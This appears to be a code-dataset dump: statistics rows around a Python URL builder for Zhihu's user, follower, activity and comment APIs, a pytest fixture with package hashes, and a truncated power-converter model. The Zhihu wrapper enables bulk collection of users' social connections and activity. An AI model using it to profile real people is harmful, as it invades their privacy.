| 24.6 | 69 | 0.804878 | 22 | 123 | 3.636364 | 0.545455 | 0.375 | 0.4125 | 0.525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.097561 | 123 | 4 | 70 | 30.75 | 0.693694 | 0 | 0 | 0 | 0 | 0 | 0.325203 | 0.260163 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
fe08169c9104f05d4aa77d800165ac4a797401a5 | 31,241 | py | Python | aiofetch/zhihu_APIs.py | ScottishFold007/zhihu_spider_aiofetch | 6b316c5cd80283018f6c09904da2bf77ab0a68dc | ["MIT"] | 1 | 2020-02-26T15:12:48.000Z | 2020-02-26T15:12:48.000Z | aiofetch/zhihu_APIs.py | ScottishFold007/zhihu_spider_aiofetch | 6b316c5cd80283018f6c09904da2bf77ab0a68dc | ["MIT"] | null | null | null | aiofetch/zhihu_APIs.py | ScottishFold007/zhihu_spider_aiofetch | 6b316c5cd80283018f6c09904da2bf77ab0a68dc | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author : strangestring
# github : https://github.com/strangestring
import time
class ZhiHu:
def __init__(self):
"""
Core of zhihu API
"""
self.members = self._Members()
self.articles = self._Articles()
self.answers = self._Answers()
self.questions = self._Questions()
self.pins = self._Pins()
self.topics = self._Topics()
class _Members:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/members'
def info(self, url_token, query_args=None):
"""
User info
:param url_token:
:param query_args:'allow_message','is_followed','is_following','description','is_org','is_blocking','employments','answer_count','follower_count','articles_count','gender','thanked_count','favorited_count','badge[?(type=best_answerer)].topics', etc.
:return:
"""
# global member_url_prefix
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}?{additional_query_items}'
else:
return f'{self.url_prefix}/{url_token}'
def followees(self, url_token, offset=0, limit=20, query_args=None):
"""
Users this user follows (followees)
:param url_token:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/followees?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/followees?offset={offset}&limit={limit}'
def followers(self, url_token, offset=0, limit=20, query_args=None):
"""
This user's followers
:param url_token:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/followers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/followers?offset={offset}&limit={limit}'
def activities(self, url_token, after_id=int(time.time()), limit=7,
session_id='<YOUR SESSION_ID>', query_args=None):
"""
Because fetching a user's full activity feed
asynchronously is expensive, it is recommended to use
this method only to determine whether the user was
active during a given period of time
If you replace 'after_id' with 'before_id' here,
the effect is the same as after_id=int(time.time())
desktop=True seems to have no effect
:param url_token:
:param after_id: another form of offset
:param session_id: each logged-in user has a unique session_id; please fill in your own uid above. You may construct your own session_id pool
:param limit:
:return:
"""
return f'{self.url_prefix}/{url_token}/activities?limit={limit}&session_id={session_id}&after_id={after_id}&desktop=True'
def pins(self, url_token, offset=0, limit=20, query_args=None):
"""
Pins (thoughts)
:param url_token:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/pins?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/pins?offset={offset}&limit={limit}'
def answers(self, url_token, offset=0, limit=20, sort_by='voteups',
query_args=None):
"""
Answers
:param url_token:
:param offset:
:param limit:
:param sort_by:'voteups'/'created'
:param query_args:'is_normal','admin_closed_comment','reward_info',
'is_collapsed','annotation_action','annotation_detail','collapse_reason',
'collapsed_by','suggest_edit','comment_count','can_comment','content',
'voteup_count','reshipment_settings','comment_permission','mark_infos',
'created_time','updated_time','review_info','question','excerpt',
'is_labeled','label_info','relationship.is_authorized','voting',
'is_author','is_thanked','is_nothelp',
'is_recognized;data[*].author.badge[?(type=best_answerer)].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/answers?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/answers?offset={offset}&limit={limit}&sort_by={sort_by}'
def articles(self, url_token, offset=0, limit=20, sort_by='voteups',
query_args=None):
"""
Articles
:param url_token:
:param offset:
:param limit:
:param sort_by:'voteups'/'created'
:param query_args:'comment_count','suggest_edit','is_normal',
'thumbnail_extra_info','thumbnail','can_comment','comment_permission',
'admin_closed_comment','content','voteup_count','created','updated',
'upvoted_followees','voting','review_info','is_labeled',
'label_info;data[*].author.badge[?(type=best_answerer)].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/articles?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/articles?offset={offset}&limit={limit}&sort_by={sort_by}'
def questions(self, url_token, offset=0, limit=20, query_args=None):
"""
Questions asked by the user
:param url_token:
:param offset:
:param limit:
:param query_args:'created','answer_count','follower_count','author',
'admin_closed_comment'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/questions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/questions?offset={offset}&limit={limit}'
def column_contributions(self, url_token, offset=0, limit=20,
query_args=None):
"""
Column contributions
:param url_token:
:param offset:
:param limit:
:param query_args:'column.intro','followers','articles_count'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/column-contributions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/column-contributions?offset={offset}&limit={limit}'
def favlists(self, url_token, offset=0, limit=20, query_args=None):
"""
Favorites lists (favlists)
:param url_token:
:param offset:
:param limit:
:param query_args:'updated_time','answer_count','follower_count','is_public'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/favlists?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/favlists?offset={offset}&limit={limit}'
def following_columns(self, url_token, offset=0, limit=20,
query_args=None):
"""
Followed columns
:param url_token:
:param offset:
:param limit:
:param query_args:'intro','followers','articles_count'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/following-columns?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/following-columns?offset={offset}&limit={limit}'
def following_topic_contributions(self, url_token, offset=0, limit=20,
query_args=None, ):
"""
Followed topics (and the answer count under each topic(?))
:param url_token:
:param offset:
:param limit:
:param query_args: 'topic','introduction'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/following-topic-contributions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/following-topic-contributions?offset={offset}&limit={limit}'
def following_questions(self, url_token, offset=0, limit=20,
query_args=None):
"""
Followed questions
:param url_token:
:param offset:
:param limit:
:param query_args: 'created','answer_count','follower_count','author'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/following-questions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/following-questions?offset={offset}&limit={limit}'
def following_favlists(self, url_token, offset=0, limit=20,
query_args=None):
"""
Followed favlists
:param url_token:
:param offset:
:param limit:
:param query_args: 'updated_time','answer_count','follower_count'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/following-favlists?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/following-favlists?offset={offset}&limit={limit}'
def marked_answers(self, url_token, offset=0, limit=20,
sort_by='voteups', query_args=None):
"""
Answers included in collections (marked answers)
:param url_token:
:param offset:
:param limit:
:param sort_by:
:param query_args:'is_normal','admin_closed_comment','reward_info',
'is_collapsed','annotation_action','annotation_detail','collapse_reason',
'collapsed_by','suggest_edit','comment_count','can_comment','content',
'voteup_count','reshipment_settings','comment_permission','mark_infos',
'created_time','updated_time','review_info','question','excerpt',
'is_labeled','label_info','relationship.is_authorized','voting',
'is_author','is_thanked','is_nothelp',
'is_recognized;data[*].author.badge[?(type=best_answerer)].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/marked-answers?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/marked-answers?offset={offset}&limit={limit}&sort_by={sort_by}'
def included_articles(self, url_token, offset=0, limit=20,
sort_by='voteups', query_args=None):
"""
Included articles
:param url_token:
:param offset:
:param limit:
:param sort_by:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/included-articles?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/included-articles?offset={offset}&limit={limit}&sort_by={sort_by}'
def mutuals(self, url_token, offset=0, limit=10, sort_by='voteups',
query_args=None):
"""
People among my followees who also follow this user
:param url_token:
:param offset:
:param limit:
:param sort_by:
:param query_args:'answer_count','articles_count','gender','follower_count',
'is_followed','is_following','badge[?(type=best_answerer)].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/relations/mutuals?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/relations/mutuals?offset={offset}&limit={limit}&sort_by={sort_by}'
class _Articles:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/articles'
def info(self, url_token, query_args=None):
"""
:param url_token:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}?{additional_query_items}'
else:
return f'{self.url_prefix}/{url_token}'
def likers(self, article_id, offset=0, limit=20, query_args=None):
"""
up_voters
:param article_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{article_id}/likers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{article_id}/likers?offset={offset}&limit={limit}'
def concerned_upvoters(self, article_id, query_args=None):
"""
Upvoters among my followees
:param article_id:
:return:
"""
return f'{self.url_prefix}/{article_id}/concerned_upvoters'
def root_comments(
self,
article_id,
offset=0,
limit=20,
order='normal', query_args=None):
"""
Structured comments; recommended only when complete comment threads are needed, since the results are harder to process
:param article_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{article_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
def comments(self, article_id, offset=0, limit=20, order='reverse',
query_args=None):
"""
Flat (unstructured) comments; 'reverse' means 'sorted by time'
:param article_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{article_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
class _Answers:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/answers'
def info(self, url_token, query_args=None):
"""
:param url_token:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}?{additional_query_items}'
else:
return f'{self.url_prefix}/{url_token}'
def voters(self, answer_id, offset=0, limit=10, query_args=None):
"""
Upvoters
:param answer_id:
:param offset:
:param limit:
:param query_args: 'answer_count','articles_count','follower_count',
'gender','is_followed','is_following','badge'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{answer_id}/voters?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{answer_id}/voters?offset={offset}&limit={limit}'
def concerned_upvoters(self, answer_id, offset=0, limit=20,
query_args=None):
"""
Upvoters among my followees
:param answer_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{answer_id}/concerned_upvoters?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{answer_id}/concerned_upvoters?offset={offset}&limit={limit}'
def favlists(self, answer_id, offset=0, limit=20, query_args=None):
"""
Favlists that include this answer
:param answer_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{answer_id}/favlists?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{answer_id}/favlists?offset={offset}&limit={limit}'
def root_comments(
self,
answer_id,
offset=0,
limit=20,
order='normal',
query_args=None):
"""
Structured comments; recommended only when complete comment threads are needed, since the results are harder to process
:param answer_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{answer_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
def comments(self, answer_id, offset=0, limit=20, order='reverse',
query_args=None):
"""
Flat (unstructured) comments; 'reverse' means 'sorted by time'
:param answer_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{answer_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
class _Questions:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/questions'
def info(self, question_id, query_args=None):
"""
Info
:param question_id:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}?{additional_query_items}'
else:
return f'{self.url_prefix}/{question_id}'
def log(self, question_id, query_args=None):
"""
Returns the question log
:param question_id:
:param query_args: unused
:return:
"""
return f'https://www.zhihu.com/question/{question_id}/log'
def followers(self, question_id, offset=0, limit=20, query_args=None):
"""
Followers of the question
:param question_id:
:param offset:
:param limit:
:param query_args:'gender','answer_count','articles_count',
'follower_count','is_following','is_followed'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}/followers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{question_id}/followers?offset={offset}&limit={limit}'
def concerned_followers(self, question_id, offset=0, limit=20,
query_args=None):
"""
Followers among my followees
:param question_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}/concerned_followers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{question_id}/concerned_followers?offset={offset}&limit={limit}'
def answers(self, question_id, offset=0, limit=20, sort_by='default',
query_args=None):
"""
Answers under the question
:param question_id:
:param offset:
:param limit:
:param sort_by: 'default','updated'
:param query_args: 'is_normal','admin_closed_comment','reward_info',
'is_collapsed','annotation_action','annotation_detail',
'collapse_reason','is_sticky','collapsed_by','suggest_edit',
'comment_count','can_comment','content','editable_content',
'voteup_count','reshipment_settings','comment_permission',
'created_time','updated_time','review_info','relevant_info',
'question','excerpt','relationship.is_authorized','is_author',
'voting','is_thanked','is_nothelp','is_labeled','is_recognized',
'paid_info','paid_info_content;data[*].mark_infos[*].url;data[*].author.follower_count','badge[*].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}/answers?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{question_id}/answers?offset={offset}&limit={limit}&sort_by={sort_by}'
def collapsed_answers(self, question_id, offset=0, limit=20,
sort_by='default', query_args=None):
"""
:param question_id:
:param offset:
:param limit:
:param sort_by:
:param query_args:
:return:
"""
return f'{self.url_prefix}/{question_id}/collapsed-answers?include=data[*].is_normal,admin_closed_comment,reward_info,is_collapsed,annotation_action,annotation_detail,collapse_reason,is_sticky,collapsed_by,suggest_edit,comment_count,can_comment,content,editable_content,voteup_count,reshipment_settings,comment_permission,created_time,updated_time,review_info,relevant_info,question,excerpt,relationship.is_authorized,is_author,voting,is_thanked,is_nothelp,is_labeled,is_recognized,paid_info,paid_info_content;data[*].mark_infos[*].url;data[*].author.follower_count,badge[*].topics&offset={offset}&limit={limit}&sort_by={sort_by}'
def root_comments(self, question_id, offset=0, limit=20,
order='normal', query_args=None):
"""
Structured comments; recommended only when complete comment threads are needed, since the results are harder to process
:param question_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{question_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
def comments(
self,
question_id,
offset=0,
limit=20,
order='reverse',
query_args=None):
"""
Flat (unstructured) comments; 'reverse' means 'sorted by time'
:param question_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{question_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
def similar_questions(self, question_id, offset=0, limit=5,
query_args=None):
"""
Similar questions
:param question_id:
:param offset:
:param limit: 5
:param query_args: 'answer_count','author','follower_count'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}/similar-questions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{question_id}/similar-questions?offset={offset}&limit={limit}'
class _Pins:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/pins'
def info(self, pin_id, query_args=None):
"""
:param pin_id:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{pin_id}?{additional_query_items}'
else:
return f'{self.url_prefix}/{pin_id}'
def actions(self, pin_id, offset=0, limit=20, query_args=None):
"""
Pin repost and applause (clap) lists
:param pin_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
return f'{self.url_prefix}/{pin_id}/actions?limit={limit}&offset={offset}'
def comments(
self,
pin_id,
offset=0,
limit=20,
order='reverse',
query_args=None):
"""
Flat (unstructured) comments
:param pin_id:
:param offset:
:param limit:
:param order: 'normal','reverse'
:return:
"""
return f'{self.url_prefix}/{pin_id}/comments?order={order}&limit={limit}&offset={offset}&status=open'
class _Topics:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/topics'
def info(self, topic_id, query_args=None):
"""
:param topic_id:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{topic_id}?{additional_query_items}'
else:
return f'{self.url_prefix}/{topic_id}'
def followers(self, topic_id, offset=0, limit=20, query_args=None):
"""
Followers
:param topic_id:
:param offset:
:param limit:
:param query_args:'gender','answer_count','articles_count',
'follower_count','is_following','is_followed'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{topic_id}/followers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{topic_id}/followers?offset={offset}&limit={limit}'
def timeline_question(self, topic_id, offset=0, limit=10,
query_args=None):
"""
:param topic_id:
:param offset:
:param limit:
:param query_args:'visit_count'
:return:
"""
'''
{self.url_prefix}/20009759/feeds/timeline_question
?include=
.target.data[?(target.type=answer)].target.content,relationship.is_authorized,is_author,voting,is_thanked,is_nothelp;
.target.data[?(target.type=answer)].target.is_normal,comment_count,voteup_count,content,relevant_info,excerpt.author.badge[?(type=best_answerer)].topics;
.target.data[?(target.type=article)].target.content,voteup_count,comment_count,voting,author.badge[?(type=best_answerer)].topics;
.target.data[?(target.type=people)].target.answer_count,articles_count,gender,follower_count,is_followed,is_following,badge[?(type=best_answerer)].topics;
data[?(target.type=answer)].target.annotation_detail,content,hermes_label,is_labeled,relationship.is_authorized,is_author,voting,is_thanked,is_nothelp;
data[?(target.type=answer)].target.author.badge[?(type=best_answerer)].topics;
data[?(target.type=article)].target.annotation_detail,content,hermes_label,is_labeled,author.badge[?(type=best_answerer)].topics;
data[?(target.type=question)].target.annotation_detail,comment_count;
&limit=10&offset=35
'''
# Customizing this query is quite involved; it is easier to
# modify it here directly
return f'{self.url_prefix}/{topic_id}/feeds/timeline_question?limit={limit}&offset={offset}'
class _Report:
def reports(self, page=1):
return f'https://www.zhihu.com/api/v4/reports?page={page}'
if __name__ == '__main__':
"""
These are the wrapped Zhihu APIs.
Create a ZhiHu instance and pass its methods as arguments to data_getter.get_data
"""
zhi = ZhiHu()
print(zhi.members.followees('zhang-jia-wei', 0, 20,
query_args=['following_count']))
print(zhi.pins.info(1109795657325490176))
print(zhi.pins.actions(1109795657325490176))
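A hedged usage sketch: the methods above only build URL strings, so any HTTP client can fetch them (requests and the question id below are illustrative assumptions, not part of this module):
# import requests
# url = zhi.questions.answers(386517222, limit=20,
#                             query_args=['content', 'voteup_count'])
# payload = requests.get(url, headers={'user-agent': 'Mozilla/5.0'}).json()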
| 41.599201 | 642 | 0.556128 | 3,357 | 31,241 | 4.922252 | 0.081323 | 0.075163 | 0.062152 | 0.061002 | 0.850823 | 0.832849 | 0.796175 | 0.775962 | 0.732692 | 0.702917 | 0 | 0.007723 | 0.312026 | 31,241 | 750 | 643 | 41.654667 | 0.761085 | 0.00685 | 0 | 0.529825 | 0 | 0.098246 | 0.427474 | 0.403894 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.003509 | null | null | 0.010526 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fe115bce34dbe8ddeab51769047045b6d3faf572 | 1,193 | py | Python | tests/conftest.py | ghtyrant/skjold | 1ce7dee2ef410ded3a4f4f045838317dcaf9a686 | ["MIT"] | null | null | null | tests/conftest.py | ghtyrant/skjold | 1ce7dee2ef410ded3a4f4f045838317dcaf9a686 | ["MIT"] | null | null | null | tests/conftest.py | ghtyrant/skjold | 1ce7dee2ef410ded3a4f4f045838317dcaf9a686 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
import pytest
@pytest.fixture
def requirements_txt_with_hashes():
return """appdirs==1.4.3 \\
--hash=sha256:d8b24664561d0d34ddfaec54636d502d7cea6e29c3eaf68f3df6180863e2166e \\
--hash=sha256:9e5896d1372858f8dd3344faf4e5014d21849c756c8d5701f78f8a103b372d92
argh==0.26.2 \\
--hash=sha256:a9b3aaa1904eeb78e32394cd46c6f37ac0fb4af6dc488daa58971bdc7d7fcaf3 \\
--hash=sha256:e9535b8c84dc9571a48999094fda7f33e63c3f1b74f3e5f3ac0105a58405bb65
aspy.yaml==1.3.0 \\
--hash=sha256:463372c043f70160a9ec950c3f1e4c3a82db5fca01d334b6bc89c7164d744bdc \\
--hash=sha256:e7c742382eff2caed61f87a39d13f99109088e5e93f04d76eb8d4b28aa143f45
atomicwrites==1.3.0; sys_platform == "win32" \\
--hash=sha256:03472c30eb2c5d1ba9227e4c2ca66ab8287fbfbbda3888aa93dc2e28fc6811b4 \\
--hash=sha256:75a9445bac02d8d058d5e1fe689654ba5a6556a1dfd8ce6ec55a0ed79866cfa6
attrs==19.3.0 \\
--hash=sha256:08a96c641c3a74e44eb59afb61a24f2cb9f4d7188748e76ba4bb5edfa3cb7d1c \\
--hash=sha256:f7b7ce16570fe9965acd6d30101a28f62fb4a7f9e926b3bbc9b61f8b04247e72"""
@pytest.fixture()
def cache_dir():
return ".skjold_cache"
| 44.185185 | 89 | 0.775356 | 75 | 1,193 | 12.253333 | 0.573333 | 0.108814 | 0.03482 | 0.026115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.418828 | 0.12741 | 1,193 | 26 | 90 | 45.884615 | 0.463977 | 0.017603 | 0 | 0 | 0 | 0 | 0.882051 | 0.666667 | 0 | 1 | 0 | 0 | 0 | 1 | 0.095238 | true | 0 | 0.047619 | 0.095238 | 0.238095 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3ddf455a47aa92d2a268ab8bfe2fa3b80de3dd4 | 152,814 | py | Python | dataset_creation/NSWPH_models_linear.py | jbesty/irep_2022_closing_the_loop | db88bd3ead2231636aa46e36f0a0272b17437612 | ["MIT"] | null | null | null | dataset_creation/NSWPH_models_linear.py | jbesty/irep_2022_closing_the_loop | db88bd3ead2231636aa46e36f0a0272b17437612 | ["MIT"] | null | null | null | dataset_creation/NSWPH_models_linear.py | jbesty/irep_2022_closing_the_loop | db88bd3ead2231636aa46e36f0a0272b17437612 | ["MIT"] | null | null | null |
import numpy as np
from dataset_creation.NSWPH_models import ModelType
def compute_damping_ratio(eig_vals):
sigma = np.real(eig_vals)
omega = np.abs(np.imag(eig_vals))
# Compute the damping ratio
damping = np.divide(-sigma, np.sqrt(sigma ** 2 + omega ** 2),
out=np.zeros_like(sigma),
where=abs(sigma) != 0)
# Index of the smallest
smallest_damping_index = np.argmin(damping)
return damping, smallest_damping_index
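# Illustrative check (editor's sketch, hypothetical values): a complex
# pole pair at -1 +/- 10j has sigma = -1, omega = 10, hence a damping
# ratio of 1 / sqrt(1 + 100) ~= 0.0995, and it is the least-damped mode
# of the set below:
#   eig_vals = np.array([-1 + 10j, -1 - 10j, -5 + 0j])
#   damping, idx = compute_damping_ratio(eig_vals)  # damping[idx] ~= 0.0995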
def converter_linear(xo, uo, cpr):
Id = xo[cpr.x_idx['Id']]
Iq = xo[cpr.x_idx['Iq']]
theta = xo[cpr.x_idx['Theta']]
Xpll = xo[cpr.x_idx['Xpll']]
vd = uo[0]
vq = uo[1]
if len(uo) > 2:
vdc = uo[2]
else:
vdc = 1
# Ac = np.array([[cpr.wn*(-cpr.Kpc - cpr.Rt)/cpr.Lt, 0, cpr.Kic*cpr.wn/cpr.Lt, 0, cpr.wn/cpr.Lt, 0, 0, -cpr.Ki_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp*cpr.wn/cpr.Lt, cpr.Kif*cpr.Kpc*cpr.Kpp*cpr.wn/cpr.Lt, cpr.Kip*cpr.Kpc*cpr.wn/cpr.Lt, 0, -cpr.Kpc*cpr.Kpp*cpr.wn/cpr.Lt, 0, 0],
# [0, cpr.wn*(-cpr.Kpc - cpr.Rt)/cpr.Lt, 0, cpr.Kic*cpr.wn/cpr.Lt, 0, cpr.wn/cpr.Lt, 0, 0, 0, 0, cpr.Kiq*cpr.Kpc*cpr.wn/cpr.Lt, 0, cpr.Kpc*cpr.Kpq*cpr.Kq*cpr.wn/cpr.Lt, cpr.Kpc*cpr.Kpq*cpr.Kv*cpr.wn/cpr.Lt],
# [-1, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf*cpr.Kpp, cpr.Kif*cpr.Kpp, cpr.Kip, 0, -cpr.Kpp, 0, 0],
# [0, -1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq*cpr.Kq, cpr.Kpq*cpr.Kv],
# [0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll*cpr.wn, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
# [vd/cpr.Tpm, vq/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0, 0],
# [vq/cpr.Tpm, -vd/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tvm],
# ])
